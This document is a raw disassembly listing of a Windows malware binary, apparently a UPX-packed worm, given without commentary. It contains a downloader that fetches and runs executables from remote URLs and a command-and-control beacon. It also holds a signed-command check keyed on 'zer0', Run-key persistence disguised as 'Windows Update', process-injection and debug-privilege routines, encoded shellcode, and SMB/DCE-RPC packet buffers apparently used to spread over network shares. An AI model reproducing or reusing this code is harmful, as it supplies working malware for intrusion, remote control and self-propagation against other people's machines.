test eax, eax
jz short loc_3100261D
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_310022BD
lea eax, [ebp+var_84]
push eax
push 0
call sub_31002476
add esp, 1Ch
jmp short loc_3100267B
; ---------------------------------------------------------------------------
loc_3100261D: ; CODE XREF: sub_31002542+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_31001054 ; lstrcmpi
test eax, eax
jnz short loc_31002666
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_31002264
add esp, 14h
test eax, eax
jnz short loc_3100267B
push ebx
push edi
push esi
mov dword_31004FE0, 1
call sub_3100222F
add esp, 0Ch
jmp short loc_3100267B
; ---------------------------------------------------------------------------
loc_31002666: ; CODE XREF: sub_31002542+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_31002476
pop ecx
pop ecx
loc_3100267B: ; CODE XREF: sub_31002542+1F�j
; sub_31002542+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_31002542 endp
; =============== S U B R O U T I N E =======================================
sub_31002680 proc near ; CODE XREF: sub_31001C18+7A�p
; sub_310026A6+CA�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_3100104C ; VirtualAlloc
retn
sub_31002680 endp
; =============== S U B R O U T I N E =======================================
sub_31002694 proc near ; CODE XREF: sub_310026A6+10B�p
; sub_31002A44+E1�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31001048 ; VirtualFree
retn
sub_31002694 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310026A6 proc near ; CODE XREF: sub_31002928+102�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_3100112C ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_310026D1
push 1
jmp loc_31002767
; ---------------------------------------------------------------------------
loc_310026D1: ; CODE XREF: sub_310026A6+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_31001058 ; GetSystemDirectoryA
mov edi, dword_3100105C
lea eax, [ebp+var_110]
push offset asc_31004CAC ; "\\"
push eax
call edi ; lstrcat
lea eax, [ebp+var_110]
push 6
push eax
call dword_3100107C ; lstrlen
lea eax, [ebp+eax+var_110]
push eax
call sub_310019D4
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset a_exe ; ".exe"
push eax
call edi ; lstrcat
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_310010C8 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31002747
push 2
jmp short loc_31002767
; ---------------------------------------------------------------------------
loc_31002747: ; CODE XREF: sub_310026A6+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31001128 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_3100276A
push [ebp+var_4]
call dword_31001098 ; CloseHandle
push 3
loc_31002767: ; CODE XREF: sub_310026A6+26�j
; sub_310026A6+9F�j
pop eax
jmp short loc_310027BB
; ---------------------------------------------------------------------------
loc_3100276A: ; CODE XREF: sub_310026A6+B4�j
mov edi, 100000h
push edi
call sub_31002680
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31001124 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_31001044 ; WriteFile
push [ebp+var_4]
call dword_31001098 ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31001A04
push ebx
call sub_31002694
add esp, 0Ch
xor eax, eax
loc_310027BB: ; CODE XREF: sub_310026A6+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_310026A6 endp
; =============== S U B R O U T I N E =======================================
sub_310027C0 proc near ; CODE XREF: sub_31002928+9D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_310027D7: ; CODE XREF: sub_310027C0+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_310027D7
pop edi
pop esi
pop ebx
retn
sub_310027C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3100281C proc near ; CODE XREF: sub_310028A1+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_3100284F
add ebx, 1Ah
loc_3100284F: ; CODE XREF: sub_3100281C+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_310010EC
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31002879
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_3100289C
; ---------------------------------------------------------------------------
loc_31002879: ; CODE XREF: sub_3100281C+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31002899
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_3100289C
; ---------------------------------------------------------------------------
loc_31002899: ; CODE XREF: sub_3100281C+68�j
mov al, [ebp+arg_0]
loc_3100289C: ; CODE XREF: sub_3100281C+5B�j
; sub_3100281C+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_3100281C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310028A1 proc near ; CODE XREF: sub_31002928+8B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_310028FE
mov edi, [ebp+arg_0]
push ebx
loc_310028B6: ; CODE XREF: sub_310028A1+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_3100281C
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_310028E2
cmp bl, 7Ah
jg short loc_310028E2
movsx esi, bl
sub esi, 61h
loc_310028E2: ; CODE XREF: sub_310028A1+34�j
; sub_310028A1+39�j
cmp bl, 41h
jl short loc_310028F2
cmp bl, 5Ah
jg short loc_310028F2
movsx esi, bl
sub esi, 41h
loc_310028F2: ; CODE XREF: sub_310028A1+44�j
; sub_310028A1+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_310028B6
pop ebx
jmp short loc_31002901
; ---------------------------------------------------------------------------
loc_310028FE: ; CODE XREF: sub_310028A1+F�j
mov edi, [ebp+arg_0]
loc_31002901: ; CODE XREF: sub_310028A1+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_310028A1 endp
; =============== S U B R O U T I N E =======================================
sub_31002908 proc near ; CODE XREF: sub_31002928+A6�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_3100290C: ; CODE XREF: sub_31002908+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_3100290C
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_31002908 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002928 proc near ; CODE XREF: sub_31002A44+DA�p
var_13C = byte ptr -13Ch
var_3C = byte ptr -3Ch
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 13Ch
push esi
push edi
push offset aZer0 ; "zer0"
mov [ebp+var_4], 1
push [ebp+arg_0]
call dword_310010F4 ; strstr
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz loc_31002A3D
add edi, 4
jz loc_31002A3D
push edi
call dword_3100107C ; lstrlen
cmp eax, 50h
jle loc_31002A3D
movsx eax, byte ptr [edi]
and byte ptr [edi+100h], 0
sub eax, 61h
mov [ebp+arg_0], eax
js loc_31002A3D
cmp eax, 1Ah
jge loc_31002A3D
inc edi
push 7Eh
push edi
call dword_310010EC ; strchr
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz loc_31002A3D
push ebx
mov bl, [esi]
push [ebp+arg_0]
and byte ptr [esi], 0
lea eax, [ebp+var_13C]
push edi
push eax
call sub_310028A1
xor edi, edi
lea eax, [ebp+var_3C]
push edi
push eax
lea eax, [esi+2]
mov [esi], bl
push eax
call sub_310027C0
lea eax, [ebp+var_3C]
push eax
call sub_31002908
add esp, 1Ch
cmp [esi+1], al
pop ebx
jnz short loc_31002A3D
push 44h
lea eax, [ebp+var_C]
push offset dword_31004CB4
push eax
call sub_31001190
add esp, 0Ch
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_3C]
push 30h
push eax
lea eax, [ebp+var_13C]
push eax
call dword_3100107C ; lstrlen
push eax
lea eax, [ebp+var_13C]
push eax
lea eax, [ebp+var_C]
push eax
call sub_310011FB
add esp, 18h
test eax, eax
jnz short loc_31002A33
cmp [ebp+arg_0], edi
jz short loc_31002A33
lea eax, [ebp+var_13C]
push eax
call sub_310026A6
pop ecx
mov [ebp+var_4], edi
loc_31002A33: ; CODE XREF: sub_31002928+F4�j
; sub_31002928+F9�j
lea eax, [ebp+var_C]
push eax
call sub_310011DF
pop ecx
loc_31002A3D: ; CODE XREF: sub_31002928+26�j
; sub_31002928+2F�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_31002928 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002A44 proc near ; CODE XREF: UPX0:31002B54�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_31002680
pop ecx
mov edi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_31001040 ; GetLocaleInfoA
xor ebx, ebx
cmp byte ptr [ebp+arg_4], bl
jz short loc_31002AAC
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_31004FBC
push dword_31004FD4
push offset aDzzqpbftouhfbx ; "dzzqpbftouhfbx"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s?scn=%d?inf=%d"...
push eax
call dword_3100111C ; wsprintfA
add esp, 1Ch
jmp short loc_31002AC4
; ---------------------------------------------------------------------------
loc_31002AAC: ; CODE XREF: sub_31002A44+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_3100111C ; wsprintfA
add esp, 0Ch
loc_31002AC4: ; CODE XREF: sub_31002A44+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_3100112C ; InternetOpenA
push ebx
push ebx
push ebx
lea ecx, [ebp+var_84]
push ebx
push ecx
push eax
mov [ebp+arg_0], eax
call dword_31001128 ; InternetOpenUrlA
lea ecx, [ebp+var_4]
mov esi, 2000h
push ecx
push esi
push edi
push eax
mov [ebp+arg_4], eax
call dword_31001124 ; InternetReadFile
loc_31002AFD: ; CODE XREF: sub_31002A44+D3�j
lea eax, [ebx+edi]
push 4
push eax
push offset aZer0_0 ; "zer0"
call sub_31002BD6 ; memcmp
add esp, 0Ch
test eax, eax
jz short loc_31002B1B
inc ebx
cmp ebx, esi
jl short loc_31002AFD
jmp short loc_31002B24
; ---------------------------------------------------------------------------
loc_31002B1B: ; CODE XREF: sub_31002A44+CE�j
add ebx, edi
push ebx
call sub_31002928
pop ecx
loc_31002B24: ; CODE XREF: sub_31002A44+D5�j
push edi
call sub_31002694
mov esi, dword_31001130
pop ecx
push [ebp+arg_4]
call esi ; InternetCloseHandle
push [ebp+arg_0]
call esi ; InternetCloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_31002A44 endp
; ---------------------------------------------------------------------------
loc_31002B40: ; DATA XREF: sub_31001E06+E9�o
push esi
loc_31002B41: ; CODE XREF: UPX0:31002B89�j
xor esi, esi
loc_31002B43: ; CODE XREF: UPX0:31002B87�j
inc esi
inc esi
mov al, byte_31004D34[esi+esi*4]
push eax
push off_31004D35[esi+esi*4]
call sub_31002A44
pop ecx
pop ecx
call dword_310010F8 ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_31001AC9
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_31001080 ; Sleep
cmp esi, 14h
jb short loc_31002B43
jmp short loc_31002B41
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31002B8C proc near ; CODE XREF: sub_31001262+128�p
; sub_31001262+134�p ...
jmp dword_31001108
sub_31002B8C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31002B92 proc near ; CODE XREF: sub_31001262+9C�p
; sub_31001262+C5�p ...
jmp dword_31001104
sub_31002B92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31002B98 proc near ; CODE XREF: sub_31001262+93�p
; sub_31001262+B2�p ...
jmp dword_31001100
sub_31002B98 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31002BA0 proc near ; CODE XREF: sub_31001262+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31002BC0
loc_31002BAC: ; CODE XREF: sub_31002BA0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31002BAC
loc_31002BC0: ; CODE XREF: sub_31002BA0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31002BA0 endp
; ---------------------------------------------------------------------------
align 10h
loc_31002BD0: ; DATA XREF: sub_31001E06+A�o
jmp dword ptr loc_310010F0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31002BD6 proc near ; CODE XREF: sub_31002A44+C4�p
jmp dword_310010E8
sub_31002BD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31002BDC proc near ; CODE XREF: sub_31002310+AB�p
jmp dword_31001074
sub_31002BDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31002BE2 proc near ; CODE XREF: sub_31002310+64�p
jmp dword_3100106C
sub_31002BE2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31002BE8 proc near ; CODE XREF: sub_31002310+2D�p
jmp dword_31001068
sub_31002BE8 endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 504h dup(0)
byte_31004000 db 0EBh ; DATA XREF: sub_31001262+24E�o
; sub_31001262+260�o ...
db 58h
word_31004002 dw 7468h ; DATA XREF: sub_310020F4+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999AAh, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_310042C8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_31001262+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_31004354 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_31004400 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_310044E0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_31001262+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_31004544 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_310045B0 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_31004654 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_310046D4 dd 401495h, 3, 40707Ch, 1, 0 ; DATA XREF: sub_31001262+51C�o
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_31004768 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_310047D4 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31004848 dd 0 ; DATA XREF: sub_31001262+3A0�o
dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31004906 dd 1004600h ; DATA XREF: sub_31001262+289�r
dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31004940 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_31001262+41B�o
; sub_31001262+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_310049B8: ; DATA XREF: sub_31001262+44A�o
jmp short loc_310049C0
; ---------------------------------------------------------------------------
jmp short loc_310049C2
; ---------------------------------------------------------------------------
align 10h
loc_310049C0: ; CODE XREF: UPX0:loc_310049B8�j
; DATA XREF: sub_31001262+5C�o
pop esp
pop esp
loc_310049C2: ; CODE XREF: UPX0:310049BA�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_310049CC dd 1CEC8166h ; DATA XREF: sub_31001262+D�r
dword_310049D0 dd 0E4FF07h ; DATA XREF: sub_31001262+1C�r
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_310017C9+62�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_310017C9+39�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_310017C9+2A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_310017C9+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_310017C9+8�o
; sub_31001E06+BA�o
align 4
aUterm13 db 'uterm13',0 ; DATA XREF: sub_31001851:loc_31001936�o
; UPX0:31001DA5�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31001851+58�o
align 10h
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31001851:loc_31001898�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31001851+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31001851+18�o
align 10h
dword_31004A80 dd 0E9F3F5h ; DATA XREF: sub_31001ADF+105�o
aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31001ADF+F9�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_31001ADF+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31001ADF+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
a_exe db '.exe',0 ; DATA XREF: sub_31001ADF+55�o
; sub_31002476+4B�o ...
align 4
aGet db 'GET',0 ; DATA XREF: sub_31001ADF+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:31001D90�o
align 4
aUser32 db 'user32',0 ; DATA XREF: sub_31001E06+C1�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_31001E06+B3�o
align 4
aWininet db 'wininet',0 ; DATA XREF: sub_31001E06+AC�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_31001E06+9F�o
align 4
aU12 db 'u12',0 ; DATA XREF: sub_31001E06+8D�o
aU11 db 'u11',0 ; DATA XREF: sub_31001E06+81�o
aU10 db 'u10',0 ; DATA XREF: sub_31001E06+75�o
aU9 db 'u9',0 ; DATA XREF: sub_31001E06+69�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_31001E06+5D�o
align 10h
aU12x db 'u12x',0 ; DATA XREF: sub_31001E06+51�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_31001E06+45�o
align 10h
aU10x db 'u10x',0 ; DATA XREF: sub_31001E06+3B�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_31001E06+22�o
align 10h
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_310020F4+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_31001C18+23�o
; sub_310023C8+5F�o ...
align 4
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_31001C18+1C�o
; sub_31002476+87�o ...
align 4
aDzzqpbftouhfbx db 'dzzqpbftouhfbx',0 ; DATA XREF: sub_31002542+57�o
; sub_31002542+8A�o ...
align 4
dd 2 dup(0)
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31002542+32�o
aClient db 'Client',0 ; DATA XREF: sub_31002542+BC�o
; sub_31002542+F8�o
align 10h
aId db 'ID',0 ; DATA XREF: sub_31002542+37�o
; sub_31002542+75�o
align 4
